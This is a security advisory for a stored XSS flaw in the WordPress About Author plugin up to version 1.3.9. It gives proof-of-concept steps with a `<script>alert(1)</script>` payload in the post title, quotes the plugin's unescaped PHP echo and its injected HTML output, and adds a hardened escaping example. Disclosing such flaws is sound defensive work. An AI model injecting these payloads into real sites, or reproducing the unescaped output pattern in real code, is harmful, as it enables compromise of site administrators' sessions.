Wordpress About Author <= 1.3.9 Authenticated Stored XSS

The Wordpress About Author plugin, in versions lower than or equal to 1.3.9, is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

Initial submission of the vulnerability

# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
The Wordpress About Author plugin, in versions lower than or equal to 1.3.9, is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Stored Cross-site scripting (XSS)
- Using a Wordpress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in the post_title input the following payload: `"><script>alert(1)</script>`
- Save. The Stored Cross-site scripting (XSS) vulnerability affects all pages/routes within the Wordpress Admin panel.

Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Detailed analysis of the vulnerability

By going within the admin panel to About Author > Add new we can add the following payload: `"><script>alert(1)</script>`. Storing the payload is not the issue in itself; XSS vulnerabilities are mainly output-related issues. Therefore, by looking at /wp-content/plugins/about-author at lines 335-353 we can observe the following unescaped output of user-supplied data: on line 345 the post title read back from the database is echoed into the markup without escaping, which leads to the stored XSS.

```php
<div id="AMSA" style="display:none;">
	<?php $all_posts = wp_count_posts( 'about_author')->publish;
	if(!$all_posts==null) {?>
	<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
	<select id="Ab_Tm_ME">
		<?php
		global $wpdb;
		$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish'	AND post_type='about_author' ");
		foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
			if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
			echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
		} ?>
	</select>
	<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
	<?php } else { ?>
		<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
	}
	?>
</div>
```

The successful exploitation of the vulnerability looks as follows in the HTML output:

```html
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Note that, because this div (hidden with style="display:none;") is rendered on all pages of the Wordpress Admin panel, the vulnerability was present on all of them. Keep in mind that `"><script>alert(1)</script>` is executed regardless of the style="display:none;", since the browser parses and runs the script element even though its container is not displayed.
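To make the output-encoding point concrete, the following is an added example (not the plugin's code and not the vendor's fix) that reproduces the vulnerable option loop over a constructed row set and places it beside a hardened version that escapes the ID for the attribute context and the title for the text context. The `esc_attr()`/`esc_html()` fallbacks are assumed stand-ins so the script runs outside WordPress.

```php
<?php
// Stand-ins for WordPress escaping helpers so this runs outside WordPress.
// Inside WordPress the real esc_attr()/esc_html() are used instead.
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string)$text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string)$text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
}

// Constructed rows standing in for $wpdb->get_results(...) on the about_author post type.
$rows = [
    (object)['ID' => 5748, 'post_title' => 'wqddqwqd'],
    (object)['ID' => 5751, 'post_title' => '"><script>alert(1)</script>'],
    (object)['ID' => 5752, 'post_title' => ''],
];

// Vulnerable rendering, mirroring the plugin: $title_var is concatenated raw into the markup.
function render_options_vulnerable(array $rows): string {
    $html = '';
    foreach ($rows as $row) {
        $title_var = $row->post_title ? $row->post_title : '(no title)';
        $html .= "<option value='" . $row->ID . "'>" . $title_var . "</option>";
    }
    return $html;
}

// Hardened rendering: every database-sourced value is escaped for the context it lands in.
function render_options_hardened(array $rows): string {
    $html = '';
    foreach ($rows as $row) {
        $title_var = $row->post_title ? $row->post_title : '(no title)';
        $html .= "<option value='" . esc_attr($row->ID) . "'>" . esc_html($title_var) . "</option>";
    }
    return $html;
}

// The vulnerable output contains a live <script> element; the hardened output
// contains only the entity-encoded text &quot;&gt;&lt;script&gt;... inside the option.
echo "Vulnerable:\n" . render_options_vulnerable($rows) . "\n\n";
echo "Hardened:\n"   . render_options_hardened($rows) . "\n";
```

Comparing the two outputs shows why the fix belongs at the echo on line 345 rather than at input time: the stored title can stay as-is, but it must never reach the page unescaped.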

How to fix

Update to the latest available version of the About Author plugin.

Public appearances

  • tba

Other references

  • tba